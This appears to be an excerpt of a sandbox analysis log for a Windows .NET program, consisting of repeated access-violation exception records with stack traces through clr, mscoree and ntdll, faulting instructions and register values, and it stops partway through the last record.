__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cfa42 0xa6cf3e9 0xa6c9cf5 0xa6c94d1 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056128 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056136 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 44665424	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0xa6cfa42 0xa6cf3e9 0xa6c9cf5 0xa6c94d1 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056128 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056136 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 41528652	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0x1fe05d4 0xa6cfbb1 0xa6c9cdd 0xa6c95d7 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056160 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056168 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 42922424	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0x1fe05d4 0xa6cfbb1 0xa6c9cf5 0xa6c95d7 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056160 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056168 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 44318984	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0x1fe05d4 0xa6cfbb1 0xa6c9cf5 0xa6c95d7 0xa6c82a0 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056160 registers.edi: 35056468 registers.eax: 0 registers.ebp: 35056168 registers.edx: 0 registers.ebx: 35059076 registers.esi: 40974328 registers.ecx: 41329136	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xa6ce608 0x1fe195b 0x1fe0f06 0xa6c82f8 0x233d9ff 0x2337855 0x2336f0b 0x2333c6b 0x23335d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa6ce64b registers.esp: 35056980 registers.edi: 35057244 registers.eax: 0 registers.ebp: 35056988 registers.edx: 0 registers.ebx: 35059076 registers.esi: 41728944 registers.ecx: 41735920	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0x7796ab 0x7794ab 0x777710 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7797e0 registers.esp: 2551268 registers.edi: 2551320 registers.eax: 0 registers.ebp: 2551332 registers.edx: 3418408 registers.ebx: 2552772 registers.esi: 42430488 registers.ecx: 0	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0xb1b584 0xb1ae1a 0xb1aced 0xb1a0e0 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549796 registers.edi: 2550140 registers.eax: 0 registers.ebp: 2549804 registers.edx: 0 registers.ebx: 2552772 registers.esi: 45383980 registers.ecx: 42796272	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0xb1b584 0xb1ae1a 0xb1ad05 0xb1a0e0 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549796 registers.edi: 2550140 registers.eax: 0 registers.ebp: 2549804 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 44100952	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0xb1b584 0xb1ae1a 0xb1ad05 0xb1a0e0 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549796 registers.edi: 2550140 registers.eax: 0 registers.ebp: 2549804 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 45404712	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x5540776 0xb1f9d9 0xb1aced 0xb1a3c9 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549772 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549780 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 42726920	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x5540776 0xb1f9d9 0xb1ad05 0xb1a3c9 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549772 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549780 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 44073672	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x5540776 0xb1f9d9 0xb1ad05 0xb1a3c9 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549772 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549780 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 45420424	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55410a2 0x5540a49 0xb1aced 0xb1a4e1 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb1f653 registers.esp: 2549824 registers.edi: 2550164 registers.eax: 0 registers.ebp: 2549832 registers.edx: 0 registers.ebx: 2552772 registers.esi: 42178032 registers.ecx: 42193372	1
__exception__ June 13, 2023, 8:29 a.m.	stacktrace: 0xb1f610 0x55410a2 0x5540a49 0xb1ad05 0xb1a4e1 0xb192b0 0x77d9ff 0x777855 0x776f0b 0x773c6b 0x7735d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a 